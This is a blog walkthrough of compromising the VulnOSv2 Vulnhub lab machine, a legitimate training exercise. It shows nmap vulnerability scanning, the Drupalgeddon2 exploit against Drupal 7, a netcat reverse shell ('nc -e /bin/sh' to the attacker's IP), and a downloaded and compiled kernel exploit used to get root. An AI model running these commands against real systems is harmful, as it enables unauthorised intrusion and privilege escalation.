VulnOSv2 Vulnhub Machine Walkthrough

Today, We are working on VulnOSv2 machine from Vulnhub.

First lets find the IP.

nmap 192.168.18.0/24

So, 192.168.18.88 is our machine’s IP.

Lets do a detailed scan now.

[email protected]:~# nmap -p- -A -T5 -sV -O --script vuln 192.168.18.88
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 12:44 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.88
Host is up (0.00073s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.18.88
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/5
|     Form id: commerce-cart-add-to-cart-form-2
|     Form action: /jabc/?q=node/5
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/6
|     Form id: commerce-cart-add-to-cart-form-3
|     Form action: /jabc/?q=node/6
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/4
|     Form id: commerce-cart-add-to-cart-form-1
|_    Form action: /jabc/?q=node/4
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=N%3bO%3dA%27%20OR%20sqlspider
|_    http://192.168.18.88:80/jabc/misc/?C=D%3bO%3dD%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.7: 
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2014-0226   6.8     https://vulners.com/cve/CVE-2014-0226
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-2161   5.0     https://vulners.com/cve/CVE-2016-2161
|       CVE-2016-0736   5.0     https://vulners.com/cve/CVE-2016-0736
|       CVE-2014-3523   5.0     https://vulners.com/cve/CVE-2014-3523
|       CVE-2014-0231   5.0     https://vulners.com/cve/CVE-2014-0231
|       CVE-2020-11985  4.3     https://vulners.com/cve/CVE-2020-11985
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2015-3185   4.3     https://vulners.com/cve/CVE-2015-3185
|       CVE-2014-8109   4.3     https://vulners.com/cve/CVE-2014-8109
|       CVE-2014-0118   4.3     https://vulners.com/cve/CVE-2014-0118
|       CVE-2014-0117   4.3     https://vulners.com/cve/CVE-2014-0117
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
6667/tcp open  irc     ngircd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
MAC Address: 08:00:27:6B:9D:FC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.73 ms 192.168.18.88

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 366.39 seconds

Lets visit the website running in the machine.

Lets go to the website now.

Looks like the site is running on Drupal. Lets do a scan using Droopescan.

droopescan scan drupal -u http://192.168.18.88/jabc

Seems like the Drupal version is 7.22 – 7.26

Lets look for vulnarabilites now.

Have a look here: https://github.com/dreadlocked/Drupalgeddon2

Looks like works in Drupal 7.x. Lets try that

ruby drupalgeddon2.rb http://192.168.18.88/jabc

We got a shell! Lets check the user.

Time for Privilege escalation. First lets get a shell through netcat

Start a listener in kali.

[email protected]:~# nc -nlvp 7777

and connect from victim machine.

nc -e /bin/sh 192.168.18.87 7777

Done.

Time for Privilege Escalation

Lets search for the OS information.

uname -a

Now search for Ubuntu 3.13 exploits using searchsploit.

searchsploit ubuntu 3.13

Lets try the first one. Linux Kernel 3.13.0 < 3.19 exploit.

wget the file to machine.

wget https://www.exploit-db.com/download/37292

Now rename the file to 37292.c and compile.

mv 37292 37292.c
gcc -o exploit 37292.c

Make sure that the exploit is there. and enter ./exploit to run it.

and… We are root!

Lets find the flag.

cd /root
cat flag.txt

Lets do another machine next day!

Published by

Melbin Mathew

I'm Melbin Mathew from Kerala, India. Infosec enthusiast, interested in Bug Hunting, Web App Pentesting and and Blogging. Love learning something new every day. Drop a mail to connect. LinkedIn | Github | Twitter Contact: melbin [-at-] melbin.in

Leave a Reply

Your email address will not be published. Required fields are marked *